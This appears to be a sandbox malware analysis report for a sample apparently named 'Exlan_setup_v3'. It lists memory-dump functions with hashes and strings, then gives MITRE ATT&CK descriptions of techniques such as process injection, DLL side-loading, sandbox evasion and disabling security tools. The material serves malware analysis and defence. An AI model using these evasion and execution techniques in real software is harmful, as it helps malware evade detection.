Source File: 00000001.00000002.1806989633.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Exlan_setup_v3.jbxd

Yara matches

Similarity

API ID: InitializeThunk
String ID: P<?$mlkj
API String ID: 2994545307-2827989283
Opcode ID: 44dcbf2306bc160c0b9c8e98e31a5c4cc6ffc0d643ea8bb451cfd4b244484baf
Instruction ID: a2a451b5c83811c592ec9cbdcb842fa13c74d76bb912ecaf96bd81121e15dd93
Opcode Fuzzy Hash: 44dcbf2306bc160c0b9c8e98e31a5c4cc6ffc0d643ea8bb451cfd4b244484baf
Instruction Fuzzy Hash: BB21F971B443108FC7248F28C8817AB72E2FB8A714F09466FE5C997280CB389C409759

Function 00427E27 Relevance: 2.6, Strings: 2, Instructions: 73COMMON

Download Yara Rule

Strings

\xB, xrefs: 00427ED2, 00427F0A
mlkj, xrefs: 00427E40

Memory Dump Source

Source File: 00000001.00000002.1806989633.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Exlan_setup_v3.jbxd

Yara matches

Similarity

API ID:
String ID: \xB$mlkj
API String ID: 0-1829937855
Opcode ID: 877e11c341ab4741196f3d0aeaabd30290aff7f2b332eec0f3c41e4c3ac92b32
Instruction ID: ad01bdb5432b394a310db5aeab9ada8a161d8daba9d17b7213e13c2b144f3aab
Opcode Fuzzy Hash: 877e11c341ab4741196f3d0aeaabd30290aff7f2b332eec0f3c41e4c3ac92b32
Instruction Fuzzy Hash: 22115B77B092208BD70C8F15981213FF793BBC9324F5F556DD45A63381CA38AC018B99

Function 00414BA8 Relevance: 1.7, Strings: 1, Instructions: 471COMMON

Download Yara Rule

Strings

mlkj, xrefs: 00414BB5

Memory Dump Source

Source File: 00000001.00000002.1806989633.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Exlan_setup_v3.jbxd

Yara matches

Similarity

API ID: InitializeThunk
String ID: mlkj
API String ID: 2994545307-2192308396
Opcode ID: 8882f8b7abff7b5e805bdddb83e7799befc65143b06bfb8656afbd4ee5d11ea0
Instruction ID: d042d89a91e7a21bef7b5219cdb11119483de293d475415d84d0dd5916dcfee6
Opcode Fuzzy Hash: 8882f8b7abff7b5e805bdddb83e7799befc65143b06bfb8656afbd4ee5d11ea0
Instruction Fuzzy Hash: 91D1F376E402148FDB24CFA9DC817ABB7B2FB9E311F1A017AE510AB391D7349D418788

Function 004226B0 Relevance: 1.7, Strings: 1, Instructions: 433COMMON

Download Yara Rule

Strings

mlkj, xrefs: 00422AE5

Memory Dump Source

Source File: 00000001.00000002.1806989633.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Exlan_setup_v3.jbxd

Yara matches

Similarity

API ID:
String ID: mlkj
API String ID: 0-2192308396
Opcode ID: e89145118a10cddc05bef83497c570722c4b1494350a87935492e1f1afefda79
Instruction ID: 896ddce2512bb3c0bf7331725b7fca99464168d55006f1224a7a2ec4ad68e4a6
Opcode Fuzzy Hash: e89145118a10cddc05bef83497c570722c4b1494350a87935492e1f1afefda79
Instruction Fuzzy Hash: DFB129B1B08320ABD710EF24985273BB3E1EF95314F58842DE8C6A7381E7B8DD41835A

Function 00416B5A Relevance: 1.6, Strings: 1, Instructions: 339COMMON

Download Yara Rule

Strings

-Zlm, xrefs: 00416BC3

Memory Dump Source

Source File: 00000001.00000002.1806989633.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Exlan_setup_v3.jbxd

Yara matches

Similarity

API ID:
String ID: -Zlm
API String ID: 0-3900455639
Opcode ID: ee0bd90de3ab3dbc23a05965b5fb527c5d226514b40f91df8162dc58fba5fde8
Instruction ID: 69b91b798612fad2d94da1616f14f7844f5fca846534d4270571852a8a831c55
Opcode Fuzzy Hash: ee0bd90de3ab3dbc23a05965b5fb527c5d226514b40f91df8162dc58fba5fde8
Instruction Fuzzy Hash: 3B912676A193508BC3248F24C8913A7B7E2EFD5310F1A896ED8CA4B391E739DC41C786

Function 0041BF29 Relevance: 1.6, Strings: 1, Instructions: 338COMMON

Download Yara Rule

Strings

L@No, xrefs: 0041C184

Memory Dump Source

Source File: 00000001.00000002.1806989633.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Exlan_setup_v3.jbxd

Yara matches

Similarity

API ID:
String ID: L@No
API String ID: 0-871082779
Opcode ID: 4ea3902d6d8fa1daa4f0706f8f596449f5b47a3019bb1012ac08b0ad277999f7
Instruction ID: 868b1991466c7e1162f7bb5e7d2572e74d26c6c55a0a5087a7d817142d1a2e99
Opcode Fuzzy Hash: 4ea3902d6d8fa1daa4f0706f8f596449f5b47a3019bb1012ac08b0ad277999f7
Instruction Fuzzy Hash: E18190328483D28BD315CB398C512A7FF92AFE7304F19866EE4E557382D7398D0687A5

Function 0041DD40 Relevance: 1.6, Strings: 1, Instructions: 310COMMON

Download Yara Rule

Strings

~, xrefs: 0041DE15

Memory Dump Source

Source File: 00000001.00000002.1806989633.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Exlan_setup_v3.jbxd

Yara matches

Similarity

API ID:
String ID: ~
API String ID: 0-1707062198
Opcode ID: bae139a2b725c50862e935a295d4183c7f8af7eabc5b9f789fde64abd4201278
Instruction ID: 4c835ab7e71280566b3d7f10b3380df357481ea3b802c9b9c0c47fb223253859
Opcode Fuzzy Hash: bae139a2b725c50862e935a295d4183c7f8af7eabc5b9f789fde64abd4201278
Instruction Fuzzy Hash: 39A13B72E086114FC715CE28CC416AABBD1AF95324F19863DE8A9CB391D738DD46C7C2

Function 00419157 Relevance: 1.5, Strings: 1, Instructions: 295COMMON

Download Yara Rule

Strings

mlkj, xrefs: 00419175

Memory Dump Source

Source File: 00000001.00000002.1806989633.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Exlan_setup_v3.jbxd

Yara matches

Similarity

API ID: InitializeThunk
String ID: mlkj
API String ID: 2994545307-2192308396
Opcode ID: 094980b1ee3c24643a04020a6f60459d1d97d7dec2904c6693d51ff754f9cae5
Instruction ID: 7ff7e5a3761f0412db839e1cd68bc63122e04fe54180d1c69d600b17546ecc18
Opcode Fuzzy Hash: 094980b1ee3c24643a04020a6f60459d1d97d7dec2904c6693d51ff754f9cae5
Instruction Fuzzy Hash: E381F872A843109BC7248F68CC9276BB7D2EB99724F1D862EE895DB390C3399C41D785

Function 00416FAD Relevance: 1.5, Strings: 1, Instructions: 217COMMON

Download Yara Rule

Strings

-Zlm, xrefs: 00416DC4

Memory Dump Source

Source File: 00000001.00000002.1806989633.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Exlan_setup_v3.jbxd

Yara matches

Similarity

API ID:
String ID: -Zlm
API String ID: 0-3900455639
Opcode ID: c6f9677d1543da015c8925c33e73b8e4c76d6c4163194bf7ac01f2da6c7f8a77
Instruction ID: 12a510ec4e45acc5227a0e30ed26f51cf24e31478287e62a0d2c465a0b000e84
Opcode Fuzzy Hash: c6f9677d1543da015c8925c33e73b8e4c76d6c4163194bf7ac01f2da6c7f8a77
Instruction Fuzzy Hash: B25103759093508BC724CF24C4913A7B7E2FFD6314F0A896ED8CA5B391DB399845CB86

Function 0043F5B0 Relevance: 1.4, Strings: 1, Instructions: 165COMMON

Download Yara Rule

Strings

=<;:, xrefs: 0043F61E

Memory Dump Source

Source File: 00000001.00000002.1806989633.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Exlan_setup_v3.jbxd

Yara matches

Similarity

API ID: InitializeThunk
String ID: =<;:
API String ID: 2994545307-4106933534
Opcode ID: 442d074965920d25a02106e7b2cc02147ce372497178405c3ae9e2dfe9f3ea6f
Instruction ID: 677a2c9f7b66bf3eaddaca16e29945dc8acfad2d0431271888eb5d72a02d6fd1
Opcode Fuzzy Hash: 442d074965920d25a02106e7b2cc02147ce372497178405c3ae9e2dfe9f3ea6f
Instruction Fuzzy Hash: D241AEB7E043149BD7109B66DC82B37B7ABBBD9304F28443EE68557361E3389D098785

Function 0043CF0D Relevance: 1.4, Strings: 1, Instructions: 124COMMON

Download Yara Rule

Strings

Dkm, xrefs: 0043CF53

Memory Dump Source

Source File: 00000001.00000002.1806989633.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Exlan_setup_v3.jbxd

Yara matches

Similarity

API ID:
String ID: Dkm
API String ID: 0-2987533777
Opcode ID: 3bbd608035d5dfb3620196f200a68a37f587031433b7a121a3669f0b1235b888
Instruction ID: dabb9c5beb46f506d9334c0ffcf07328337ce7ccfc2dfbe7f0bd877add8e8045
Opcode Fuzzy Hash: 3bbd608035d5dfb3620196f200a68a37f587031433b7a121a3669f0b1235b888
Instruction Fuzzy Hash: 9031F4367486600BD308CF38CCA0667B7E3AFCA218F0D976E90A59B395DA34D8068785

Function 00414E41 Relevance: 1.3, Strings: 1, Instructions: 91COMMON

Download Yara Rule

Strings

mlkj, xrefs: 00414E7F

Memory Dump Source

Source File: 00000001.00000002.1806989633.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Exlan_setup_v3.jbxd

Yara matches

Similarity

API ID: InitializeThunk
String ID: mlkj
API String ID: 2994545307-2192308396
Opcode ID: 6b4f5b734e450e5a23092af6e03df4c92b91f0c1beee2522f144e2ff5b4c632e
Instruction ID: 46cc89a9505a2bd6da3b45514240a2b58227631b40ade1dcb725129d4baf97a4
Opcode Fuzzy Hash: 6b4f5b734e450e5a23092af6e03df4c92b91f0c1beee2522f144e2ff5b4c632e
Instruction Fuzzy Hash: 2811B27AB406118FD7148BA9EC806F7B7A3FBEA315F2D583AD141A7350D3389C829758

Function 0041892C Relevance: 1.3, Strings: 1, Instructions: 81COMMON

Download Yara Rule

Strings

mlkj, xrefs: 00418934

Memory Dump Source

Source File: 00000001.00000002.1806989633.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Exlan_setup_v3.jbxd

Yara matches

Similarity

API ID: InitializeThunk
String ID: mlkj
API String ID: 2994545307-2192308396
Opcode ID: 07966e12e2b69c0ebd4a30fe0e6cc282f68c7ed9ab9be0188590601f5712cc30
Instruction ID: dc127337e00f44ff01fe24dc62a41a836b1edc7693588b72e354eaef7c2f8d9b
Opcode Fuzzy Hash: 07966e12e2b69c0ebd4a30fe0e6cc282f68c7ed9ab9be0188590601f5712cc30
Instruction Fuzzy Hash: 0D1122B2A503108BC72CCA29CC827B77296EBCA314F19C23EE5C967291DB389C419659

Function 0042757C Relevance: 1.3, Strings: 1, Instructions: 54COMMON

Download Yara Rule

Strings

mlkj, xrefs: 00427590

Memory Dump Source

Source File: 00000001.00000002.1806989633.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Exlan_setup_v3.jbxd

Yara matches

Similarity

API ID:
String ID: mlkj
API String ID: 0-2192308396
Opcode ID: 8ecd4643eed6ac9c56316911b5678f3ff32aaa89162ba5f715420ea9cc90337c
Instruction ID: 5d224bb689b83c44bc22cc3cdefed744458eb72ed75420293b207dbb565db338
Opcode Fuzzy Hash: 8ecd4643eed6ac9c56316911b5678f3ff32aaa89162ba5f715420ea9cc90337c
Instruction Fuzzy Hash: DF012B77B099208BCB1C4E29982213FB2E366D1334B6F5A2EC86757790C93C9C014789

Function 00407410 Relevance: .6, Instructions: 625COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1806989633.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Exlan_setup_v3.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6e797157fb35717b6a91bbe19d3c6782b16ec68ef1e5ad1ec3f47f605a4e618f
Instruction ID: 2f2e6cbe8b20f85f39403666205f825d9ff91c7dfe8344ba04213d258afb6bd7
Opcode Fuzzy Hash: 6e797157fb35717b6a91bbe19d3c6782b16ec68ef1e5ad1ec3f47f605a4e618f
Instruction Fuzzy Hash: 2E22B272A087118BC725DF18D9806ABB3E1BFC4319F19893ED9C6A7385D738B8518B47

Function 00417913 Relevance: .6, Instructions: 588COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1806989633.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Exlan_setup_v3.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 36f2da7ab973ca487e1d36ce41dca55073afae91075196dd802b4e773db23be0
Instruction ID: 1325b645ede8c0aa98cd8940b09cf85a43187257169980f47c0a879beed5cce2
Opcode Fuzzy Hash: 36f2da7ab973ca487e1d36ce41dca55073afae91075196dd802b4e773db23be0
Instruction Fuzzy Hash: 8A0237719183528BC714CF28C8906ABBBF1FFD9314F194A2DE8C59B391E7389945C78A

Function 00426977 Relevance: .6, Instructions: 560COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1806989633.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Exlan_setup_v3.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1fb374c321aebb96df758b06dcf1b7e74cd2ef8a017d66baf814d43303669e5b
Instruction ID: ae906a32fe985a778ccdfd8ce2f2347d04a1a4c1bf45e1481e0364604edf5646
Opcode Fuzzy Hash: 1fb374c321aebb96df758b06dcf1b7e74cd2ef8a017d66baf814d43303669e5b
Instruction Fuzzy Hash: B00268B1A083518BC714CF25D89126BB7E2AFD6304F59887EE4D58B342E63CDD09C79A

Function 004293E7 Relevance: .3, Instructions: 277COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1806989633.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Exlan_setup_v3.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05765cfb6747ec04822f8d53abb628c43b1135d20560aa89877f0432d832a3b5
Instruction ID: b9e3acfaa7ed31289767c89a2dfe6bdf604533f24333c4fbdb0f520955b5523e
Opcode Fuzzy Hash: 05765cfb6747ec04822f8d53abb628c43b1135d20560aa89877f0432d832a3b5
Instruction Fuzzy Hash: F6A1D9B6E112258FC718CF69DC8169E7F72FB88310F1A826DD855AB795C7788801CBD4

Function 0042B730 Relevance: .2, Instructions: 194COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1806989633.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Exlan_setup_v3.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7dce0b2bebc72e288a257ccdf8d724f03fe00b0e5ce9906c4f966d5d3e5f45ca
Instruction ID: 1009c85130d85d9d8f2f7c606b315382328a49d909bfea7cda19d52a97159e22
Opcode Fuzzy Hash: 7dce0b2bebc72e288a257ccdf8d724f03fe00b0e5ce9906c4f966d5d3e5f45ca
Instruction Fuzzy Hash: E9517962A193E04BD7348F3994503ABBBD6DBD7314F8C859DD9C46B343DB384805879A

Function 0042B669 Relevance: .1, Instructions: 122COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1806989633.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Exlan_setup_v3.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f67fba54f22a98332b60f3765334a4c855a8092b2a651b7a81382d95475630f7
Instruction ID: f23dac6bed6e73008d269a3ef701f5ea2c902c44980c0e0ebf1cbe472de3a406
Opcode Fuzzy Hash: f67fba54f22a98332b60f3765334a4c855a8092b2a651b7a81382d95475630f7
Instruction Fuzzy Hash: C33114A1A083E08ADB348F2590503BBBBE5CFDB310F88899DD5C95B343C7384405CB9A

Function 00434000 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1806989633.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Exlan_setup_v3.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
Instruction ID: 1221bdfba15bb73fc417ffe21b97d02c20896f0dc6f6f2c5ff93a720df73cccf
Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
Instruction Fuzzy Hash: A111E933B051D40EC31A8D3C85005A9BFB30AD7235F2993DAF5F89B2D2D6279D8A8759

Function 0043B806 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1806989633.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Exlan_setup_v3.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 06cdc05c73faf8758e32161d1058dd2d938143accdff4f5b61eb1df5fbfb253b
Instruction ID: 6670acaf1119e7dcac54d289ed0e99732564ab5312c7145089b6d860c0e6a71d
Opcode Fuzzy Hash: 06cdc05c73faf8758e32161d1058dd2d938143accdff4f5b61eb1df5fbfb253b
Instruction Fuzzy Hash: C7010466F566400BDB0D8A38AC612BF679386DB12174DD27EE052C3BCAE92CD80B4649

Function 00429F50 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1806989633.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Exlan_setup_v3.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 658b491ea0d88ef9da8cc5190e722ca198401e1c46d04e0af6f1908592c4c9f9
Instruction ID: d469fa74c0d71e1b26533fac618aa504cb0f89a632139ab70ef1ac509735dc81
Opcode Fuzzy Hash: 658b491ea0d88ef9da8cc5190e722ca198401e1c46d04e0af6f1908592c4c9f9
Instruction Fuzzy Hash: 980192F1B0031157E7609E55B6C0727B2A86F94718F59443EE80897745EB7DFC04C6AD

Function 00402BB0 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1806989633.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Exlan_setup_v3.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4702e2e738cc3821434bd878e269d80ed4720d434eed905a4a70a113bbf7b7c9
Instruction ID: 3129c4532d42470b0f14f5273e7f4e35afcf011c11acaa0253aafb9be6ead9aa
Opcode Fuzzy Hash: 4702e2e738cc3821434bd878e269d80ed4720d434eed905a4a70a113bbf7b7c9
Instruction Fuzzy Hash: D2F02B7A7192190FA310DE69AD8453BB395D7D6300F054439DB41E3341D471E8469294

Function 004294CC Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1806989633.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Exlan_setup_v3.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 06ac7d351699d18752c63c8c43f6445c630fcedd60fb85c46d547eb22685157b
Instruction ID: d4ce8e78cedfa1c22d1b42ae50317a434596d63191a2245fbc5a81307e5b46a0
Opcode Fuzzy Hash: 06ac7d351699d18752c63c8c43f6445c630fcedd60fb85c46d547eb22685157b
Instruction Fuzzy Hash: C6F03730B0C6678F8F189F9C90E14BEFB71BF0A344F94017DC55567641C6B45906C658

Function 0043B780 Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1806989633.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Exlan_setup_v3.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 22e5585ab515e789e02b6df444b96208b8ba407c1c9d0c75b0c2b0b66210a1ad
Instruction ID: b1045652d4c1e996b60dc94536ef9f030eef17cdd43a749d13cd3bee87b20581
Opcode Fuzzy Hash: 22e5585ab515e789e02b6df444b96208b8ba407c1c9d0c75b0c2b0b66210a1ad
Instruction Fuzzy Hash: 26F06C749043405741247F3D9D46527BE75B603500B80955CD9D59B755D620D41687D6

Function 0043D3E0 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1806989633.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Exlan_setup_v3.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7a6cf608c28deffc4e41384c7dd13b67ae3b927c22120ecb4b012213033fbf35
Instruction ID: 1f44434e7ac23aaf239e2e9f76de04b8a024cee31bee16e57b2d0eeb4393e5b0
Opcode Fuzzy Hash: 7a6cf608c28deffc4e41384c7dd13b67ae3b927c22120ecb4b012213033fbf35
Instruction Fuzzy Hash: 84E0263AA1C2048FC7006F24FC04A6BFBACEB833A8F09147EE104A3211C230DA24C699

Function 0043D3B0 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1806989633.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Exlan_setup_v3.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 340020fda8284cdd0356b5c5980215f7091cd3a98cfec19190aeb26d3cdf624f
Instruction ID: c3efb1793eb889443b6ff9d8cb993e1e480fede7814542f019e0bf1177d8397a
Opcode Fuzzy Hash: 340020fda8284cdd0356b5c5980215f7091cd3a98cfec19190aeb26d3cdf624f
Instruction Fuzzy Hash: A2D0C231A0C24047DB4A8E38A0920ABE7A2C79B220F51792DC0C2D3671C526882B8E0A

Function 0041807C Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1806989633.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Exlan_setup_v3.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0608122a89c20dbb3e328f2ebbc93a7eed698f70beca9451f3950851c72500c7
Instruction ID: 2e5e3819406981218d35a828e3b8bdaf4ef2ee12e2216493bfbac98516ddb4a1
Opcode Fuzzy Hash: 0608122a89c20dbb3e328f2ebbc93a7eed698f70beca9451f3950851c72500c7
Instruction Fuzzy Hash: 33D09EB48582418AD124FF11D9516AAF3A5AF96304F40182DD08963162DF35A918CA5B

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

